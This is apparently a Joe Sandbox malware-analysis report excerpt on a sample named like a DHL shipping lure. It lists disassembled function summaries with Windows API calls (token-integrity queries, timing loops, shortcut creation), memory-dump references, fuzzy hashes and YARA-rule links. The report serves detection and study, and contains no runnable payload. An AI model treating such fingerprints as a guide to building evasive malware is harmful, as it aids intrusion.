SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0095B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0095B489
GetSystemMetrics.USER32(00000004), ref: 0095B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00941184,00000000), ref: 0095B4D0

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: ce71c3d6ee845132f29c19637d634e3050090fff6ee36d8bbb6fbb3fb1adfe0e
Instruction ID: 930126f99ea25d8090172e8131c241c1d4feb44e9eb54652e0dee2aa0c394a67
Opcode Fuzzy Hash: ce71c3d6ee845132f29c19637d634e3050090fff6ee36d8bbb6fbb3fb1adfe0e
Instruction Fuzzy Hash: AD218031524215AFCB20DF3ACC48A6A37A8EB05732F154B29FD26C71F1E7309855DB80

Function 009297E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00929802

Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00929834
__itow.LIBCMT ref: 0092984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00929874
__itow.LIBCMT ref: 00929885

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 2b4ffc16647450a425ef18aa4813cb4ad68360aed9d7535fd03ca8c8cb1a8911
Instruction ID: 595851084b7b89222d4ed821da1a2f6604e765eb53e7396b9b68791de569d119
Opcode Fuzzy Hash: 2b4ffc16647450a425ef18aa4813cb4ad68360aed9d7535fd03ca8c8cb1a8911
Instruction Fuzzy Hash: 2A210731B00218ABDB10AA759C86EEE3BADEF4A724F080035FD05DB245E6708D459792

Function 008D12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D134D
SelectObject.GDI32(?,00000000), ref: 008D135C
BeginPath.GDI32(?), ref: 008D1373
SelectObject.GDI32(?,00000000), ref: 008D139C

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 4022d698002c35d9af9d758aebb506fee5c4994f6bd4c3713fb9da96d0d132e4
Instruction ID: 12c5776058c5ff15cc563cc58bd6a682d5ca09a2bb2472ffbec4109ebe3f4a13
Opcode Fuzzy Hash: 4022d698002c35d9af9d758aebb506fee5c4994f6bd4c3713fb9da96d0d132e4
Instruction Fuzzy Hash: 3A213A70828308EFDF159F2ADC087A97BB9FB10366F148327F814D66A0D7759991EB90

Function 0092C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0092C176
_memcmp.LIBCMT ref: 0092C194
_memcmp.LIBCMT ref: 0092C1A7
_memcmp.LIBCMT ref: 0092C1BF
_memcmp.LIBCMT ref: 0092C1D7

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: ad877e83ff1a72d83bd0bef4af1bc62ef3ff6eaf6283b4d57ab08c0f3c61d012
Instruction ID: a519a8cc4bda5a7eb563719aeafc98025492f98413cb730c30fb6a68d130ac77
Opcode Fuzzy Hash: ad877e83ff1a72d83bd0bef4af1bc62ef3ff6eaf6283b4d57ab08c0f3c61d012
Instruction Fuzzy Hash: CD0192E16085297BE604A7246C47EBF675CEF7139CB444121FE04E6287E6599E2182E1

Function 00934D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00934D5C
__beginthreadex.LIBCMT ref: 00934D7A
MessageBoxW.USER32(?,?,?,?), ref: 00934D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00934DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00934DAC

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: ad547d89eae25207a04efccd655237fd9ce7e9c950d469d607f034b90529d7b5
Instruction ID: ebbc1c9f8f23f714df34ac3e1be2bc99787feeb9700c553fc6eb2c5de2be0f22
Opcode Fuzzy Hash: ad547d89eae25207a04efccd655237fd9ce7e9c950d469d607f034b90529d7b5
Instruction Fuzzy Hash: B9110876918608BBC7019BBC9C04A9F7FACEB85321F144266F924D3290D6759D009BA1

Function 0092874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00928766
GetLastError.KERNEL32(?,0092822A,?,?,?), ref: 00928770
GetProcessHeap.KERNEL32(00000008,?,?,0092822A,?,?,?), ref: 0092877F
HeapAlloc.KERNEL32(00000000,?,0092822A,?,?,?), ref: 00928786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092879D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: c8f010614bf6b050622d2d470751e0c08dc9e0d8804498f319a339ee4cbb0eb5
Instruction ID: 0c856279265d5e97c7a724ac666efdd0993f001b4102fbe3014535700ba40b9b
Opcode Fuzzy Hash: c8f010614bf6b050622d2d470751e0c08dc9e0d8804498f319a339ee4cbb0eb5
Instruction Fuzzy Hash: 01014B71216618FFDB204FA6EC98D6B7BACEF893667200469F849C3260DA318C10DB60

Function 009354E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00935502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00935510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00935518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00935522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0093555E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 9f43b760cafdd61ec01b90425535c07740283fe0eb5f33ed82f72bd14e8cfa7f
Instruction ID: 95e65d9bbfb4b25fe31eb3872604ce5740f7a14b0983512fae9eab13da7ba96a
Opcode Fuzzy Hash: 9f43b760cafdd61ec01b90425535c07740283fe0eb5f33ed82f72bd14e8cfa7f
Instruction Fuzzy Hash: C9015E71C19A19DBCF00EFE5E8585EDBB78FB0D712F020456E401B2140DB305554DBA1

Function 00927652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?,?,0092799D), ref: 0092766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 0092768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 00927698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?), ref: 009276A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 009276B4

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 14a9cf5059475a5e716343ee24b64ade103a9c8170b815f024db31cdb20dd00d
Instruction ID: fedccec81b449809786acff6c32221e1c22bbe22971f8f120d891d07f60ba332
Opcode Fuzzy Hash: 14a9cf5059475a5e716343ee24b64ade103a9c8170b815f024db31cdb20dd00d
Instruction Fuzzy Hash: 4C01A772615728BFDB105F99EC44BAABFADEF44762F140028FD05E2215E731DD4197A0

Function 009285F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00928608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00928612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00928621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00928628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0092863E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5817edd58c4884742b4fa9d00378d1bce4198649da8773cbd95135f317c073b3
Instruction ID: e2127bf4cc6c6c0428a8b8acfaa1e5207c56c74c43c3eff09b043668406dc5b3
Opcode Fuzzy Hash: 5817edd58c4884742b4fa9d00378d1bce4198649da8773cbd95135f317c073b3
Instruction Fuzzy Hash: E1F06235216315AFEB200FA6EC9DE6B3BACEF89765B040425F945C7190CB719C45EB60

Function 00928652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00928669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00928673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00928682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00928689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0092869F

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 98671c837ea9412634b5de6ebc08ff5c8f8a94b4e66df23c95ac799cc4dbac04
Instruction ID: 19559e1e1b9d30e0d8b075a75f4063339466edc0659579da4373ef3dac91b0bc
Opcode Fuzzy Hash: 98671c837ea9412634b5de6ebc08ff5c8f8a94b4e66df23c95ac799cc4dbac04
Instruction Fuzzy Hash: D3F0AF70216314BFEB111FA6EC98E6B3BADEF89766B140025F905C2190CA709800EB60

Function 0092C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0092C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 0092C6D1
MessageBeep.USER32(00000000), ref: 0092C6E9
KillTimer.USER32(?,0000040A), ref: 0092C705
EndDialog.USER32(?,00000001), ref: 0092C71F

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: a9de9b18f5f0763fe28fd16b5953eb0b757a17b30e102c4d33bdb12a6b13cd49
Instruction ID: 6209bc716fb74fef9d34b75ad8e35312451d0b99d7fde3917401de36871c4268
Opcode Fuzzy Hash: a9de9b18f5f0763fe28fd16b5953eb0b757a17b30e102c4d33bdb12a6b13cd49
Instruction Fuzzy Hash: 6F01D670415718ABEB206B21EC6EF9A77BCFF00702F000669F542A10E0EBF4A9549F81

Function 008D13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 008D13BF
StrokeAndFillPath.GDI32(?,?,0090BAD8,00000000,?), ref: 008D13DB
SelectObject.GDI32(?,00000000), ref: 008D13EE
DeleteObject.GDI32 ref: 008D1401
StrokePath.GDI32(?), ref: 008D141C

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 90f70813f158ef4969b174e3a726d34c04780daa5e2422ce393263d09fb2a2e7
Instruction ID: f4383737da5a959f786a61ed16d086150cb73bf84ff2831bae0fde9de216f0ed
Opcode Fuzzy Hash: 90f70813f158ef4969b174e3a726d34c04780daa5e2422ce393263d09fb2a2e7
Instruction Fuzzy Hash: C3F0B230028708ABDB155F2BEC0C7587FA6FB01326F088326E429856F1C7358995EF54

Function 0093C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0093C69D
CoCreateInstance.OLE32(00962D6C,00000000,00000001,00962BDC,?), ref: 0093C6B5

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

CoUninitialize.OLE32 ref: 0093C922

Strings

.lnk, xrefs: 0093C631, 0093C659, 0093C663

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: c183869bf01e628d53fddb1bb3dea66ff7dbebbc53e7adbfbb688c81145e4de8
Instruction ID: 79cb01a6314df2ef4113d0bc52e0dde0c2c1b7682f931b0787a213b35e054db3
Opcode Fuzzy Hash: c183869bf01e628d53fddb1bb3dea66ff7dbebbc53e7adbfbb688c81145e4de8
Instruction Fuzzy Hash: EAA12C71108215AFD700EF58C891EABB7E8FF94714F004A5DF196D7292EB70EA49CB52

Function 008E2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

Part of subcall function 008D7BB1: _memmove.LIBCMT ref: 008D7C0B

__swprintf.LIBCMT ref: 008E302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008E2EC6

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 54cca51e82586c8bb298be43d3eb6aae0dd51fcb742188773f5b0b78619c707c
Instruction ID: e444406973f21fd42a5bc7823f2fe5c1457321e3b3f5d9a45097c229f4cec1ff
Opcode Fuzzy Hash: 54cca51e82586c8bb298be43d3eb6aae0dd51fcb742188773f5b0b78619c707c
Instruction Fuzzy Hash: 24917D71508745AFC728EF28D985C6EB7A8FF86750F00491EF581D73A1EA20EE45CB52

Function 0093BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE

CoInitialize.OLE32(00000000), ref: 0093BC26
CoCreateInstance.OLE32(00962D6C,00000000,00000001,00962BDC,?), ref: 0093BC3F
CoUninitialize.OLE32 ref: 0093BC5C

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

Strings

.lnk, xrefs: 0093BC08, 0093BC16

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 7a3c03c359676ff25b0f61f75224edc231ff7d9314a53d80b714816a0bfff6b9
Instruction ID: 41117454846bbb18e5527c140555caac12c3e834306682a75f90d078901df7be
Opcode Fuzzy Hash: 7a3c03c359676ff25b0f61f75224edc231ff7d9314a53d80b714816a0bfff6b9
Instruction Fuzzy Hash: BFA13575204311AFCB10DF18C494E5ABBE5FF88314F148A99F99A9B3A1CB31ED45CB92

Function 008F524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 008F52DD

Part of subcall function 00900340: __87except.LIBCMT ref: 0090037B

Strings

pow, xrefs: 008F52B5, 008F52D2

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: f309da572b73b6ac79f201d41379313cdda6c2d191489e32d82c25b5d7fdd56d
Instruction ID: cd25ca473e2b7983e9e9fd4447f9e398b53b2a29a8ae4be0f861c58709b38fc9
Opcode Fuzzy Hash: f309da572b73b6ac79f201d41379313cdda6c2d191489e32d82c25b5d7fdd56d
Instruction Fuzzy Hash: A7516B21A1CA098BCB117738C95137E7B94FB81754F204E59E3D5C23E9EE788CD4AA4A

Function 008F023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 008F0280
+, xrefs: 008F0277

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 42854e42d7c37e1214e4e582f3c47e5d644a3a8220471d5bad310f10df51263b
Instruction ID: 3c484206fdc5efc77a020d57f8248aabcb142ba28fafd73fa35123af30586ff0
Opcode Fuzzy Hash: 42854e42d7c37e1214e4e582f3c47e5d644a3a8220471d5bad310f10df51263b
Instruction Fuzzy Hash: AB51317510426ACFCF259F28E8886FA7BA8FF15310F184056E8919B3E5D7349C42CB61

